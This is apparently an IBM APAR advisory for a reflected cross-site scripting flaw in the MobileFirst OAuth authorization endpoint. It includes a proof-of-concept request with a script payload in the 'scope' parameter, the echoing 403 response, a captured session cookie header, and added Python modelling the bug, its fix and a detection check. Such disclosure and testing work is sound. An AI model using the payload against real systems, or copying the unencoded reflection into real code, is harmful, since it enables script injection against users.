APAR status
Closed as program error.
Error description
In detail, the vulnerability is present in the OAuth Server API endpoint "authorization/v1/authorization", which client applications use to perform authorization. The vulnerable parameter is "scope": if its value names a "realm" that is not defined in authenticationConfig.xml, the server answers with HTTP 403 Forbidden and reflects the value, unencoded, in the body of the HTTP response. Because that response is served with Content-Type: text/html, a realm name that contains HTML markup is rendered by the browser (reflected cross-site scripting).

Steps to Reproduce Vulnerability:
To reproduce the vulnerability it is sufficient to send a GET request to the OAuth Server API endpoint "authorization/v1/authorization" with the payload as the value of the "scope" parameter. In the request below the scope token is prefixed with "-", which the server interprets as a logout operation for the named realm; the resulting "Logout failed" error echoes the realm name verbatim.

Sample PCAP/Proof of Concept/Traces or Description of Exploit/Attack Code:

HTTP Request
[[
GET /[NOT DISCLOSED]/authorization/v1/authorization?client_id=[NOT DISCLOSED]&scope=-WSAuthRealm%22%3E%3Cscript%3Ealert(1)%3C/script%3E&isAjaxRequest=true&x=0.7680186943616718 HTTP/1.1
Host: [NOT DISCLOSED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=258156760.1680166455663768300.1471870420.1472114198.1472118485.5; __utmz=258156760.1471870420.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=0000VsB3f4RmIr2S8WS2iJr-E5G:13c24b52-ac63-4c87-89c5-7ecd12c481f3; citrix_ns_id=iJ29MbqK2oFYiA5vZ6lhuRw4pXcA000
Connection: close
]]

HTTP Response
[[
HTTP/1.1 403 Forbidden
X-Powered-By: Servlet/3.0
Content-Type: text/html
Connection: Close
Date: Mon, 29 Aug 2016 16:13:37 GMT
Strict-Transport-Security: max-age=157680000
X-Expires-Orig: None
Cache-Control: max-age=0, must-revalidate, private
Content-Length: 109

Logout failed: The realm 'WSAuthRealm"><script>alert(1)</script>' is not defined in authenticationConfig.xml.
]]
Local fix
Problem summary
****************************************************************
* USERS AFFECTED:                                              *
* None in particular, low severity vulnerability               *
****************************************************************
* PROBLEM DESCRIPTION:                                         *
* The realm name provided in the logout operation is not       *
* properly sanitized when printing it back as an error         *
* response.                                                    *
****************************************************************
* RECOMMENDATION:                                              *
****************************************************************
Problem conclusion
Sanitization added.
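The error description above and the one-line conclusion "Sanitization added." together describe a reflected cross-site scripting bug and its fix. The Python below is an added illustration, not IBM's code and not a reconstruction of the MobileFirst server: it models the pre-fix 403 response from the APAR (the body it builds is the same 109 bytes shown in the trace), models the fix as HTML entity encoding of the realm name before it is echoed, and includes the check a tester would run over a captured response to decide whether a server still reflects the payload into an HTML body. The request line is taken from the report with its [NOT DISCLOSED] placeholders; the function names and the assumption that the fix consisted of HTML-encoding the realm are mine.

```python
"""Model of the PI71750 reflection and its fix (illustrative; not IBM's code).

The vulnerable server echoed the realm name taken from the `scope`
parameter into a text/html 403 body without encoding it. The two
builders below reproduce that behaviour and a fixed behaviour; the
checker is what a tester runs against a captured response to confirm
whether a deployment still reflects the payload unescaped into HTML.
"""
import html
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the request line from the APAR, placeholders kept.
REQUEST_LINE = (
    "GET /[NOT DISCLOSED]/authorization/v1/authorization"
    "?client_id=[NOT DISCLOSED]"
    "&scope=-WSAuthRealm%22%3E%3Cscript%3Ealert(1)%3C/script%3E"
    "&isAjaxRequest=true&x=0.7680186943616718 HTTP/1.1"
)


def realm_from_request_line(request_line: str) -> str:
    """Return the realm named by a '-' (logout) token in the scope parameter."""
    # Split off the method and the trailing HTTP-version token rather than
    # splitting on every space: the "[NOT DISCLOSED]" placeholder contains one.
    _method, rest = request_line.split(" ", 1)
    target = rest.rsplit(" ", 1)[0]
    scope = parse_qs(urlsplit(target).query).get("scope", [""])[0]
    # Scopes are space-separated tokens; the report's payload is a single
    # token prefixed with '-', which the server treated as a logout request.
    for token in scope.split():
        if token.startswith("-"):
            return token[1:]
    return ""


def _response(body: str, content_type: str) -> bytes:
    """Assemble a minimal HTTP/1.1 403 with the given body and content type."""
    data = body.encode()
    head = ("HTTP/1.1 403 Forbidden\r\n"
            f"Content-Type: {content_type}\r\n"
            f"Content-Length: {len(data)}\r\n\r\n")
    return head.encode() + data


def build_403_vulnerable(realm: str) -> bytes:
    """Pre-fix behaviour: the realm is interpolated verbatim into an HTML body."""
    body = (f"Logout failed: The realm '{realm}' is not defined in "
            "authenticationConfig.xml.")
    return _response(body, "text/html")


def build_403_fixed(realm: str) -> bytes:
    """Post-fix behaviour, modelled here as HTML-encoding the realm (assumption).

    html.escape(quote=True) turns <, >, &, " and ' into entities, so the
    reflected value can no longer close the surrounding quote or open a tag.
    """
    body = (f"Logout failed: The realm '{html.escape(realm, quote=True)}' "
            "is not defined in authenticationConfig.xml.")
    return _response(body, "text/html")


def reflects_unescaped(response: bytes,
                       marker: str = "<script>alert(1)</script>") -> bool:
    """True when the marker appears verbatim in a body served as text/html.

    A text/plain or JSON body containing the same bytes is not rendered as
    markup by the browser, so raw reflection there is not by itself XSS.
    """
    head, _, body = response.partition(b"\r\n\r\n")
    headers = {}
    for line in head.decode().split("\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip().lower()
    is_html = headers.get("content-type", "").startswith("text/html")
    return is_html and marker.encode() in body


if __name__ == "__main__":
    realm = realm_from_request_line(REQUEST_LINE)
    print("realm echoed by server :", realm)
    print("pre-fix reflects XSS   :", reflects_unescaped(build_403_vulnerable(realm)))
    print("post-fix reflects XSS  :", reflects_unescaped(build_403_fixed(realm)))
```

The check insists on a text/html content type before reporting reflection, because the same characters in a text/plain or JSON error body are not interpreted as markup. Encoding the echoed value is the fix the APAR records; serving the error as text/plain would be a complementary hardening rather than a substitute for it.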
Temporary fix
Comments
APAR Information
APAR number
PI71750
Reported component name
MOBILE1ST PLATF
Reported component ID
5725I4301
Reported release
710
Status
CLOSED PER
PE
NoPE
HIPER
NoHIPER
Special Attention
NoSpecatt / Xsystem
Submitted date
2016-11-03
Closed date
2017-07-04
Last modified date
2017-07-04
APAR is sysrouted FROM one or more of the following:
APAR is sysrouted TO one or more of the following:
Fix information
Fixed component name
MOBILE1ST PLATF
Fixed component ID
5725I4301
Applicable component levels
R710 PSY
UP
R800 PSY
UP
Business Unit: Cloud & Data Platform (BU053)
Product: IBM Worklight (SSZH4A)
Platform: Platform Independent (PF025)
Version: 710
Line of Business: Automation (LOB45)
Document Information
Modified date:
04 July 2017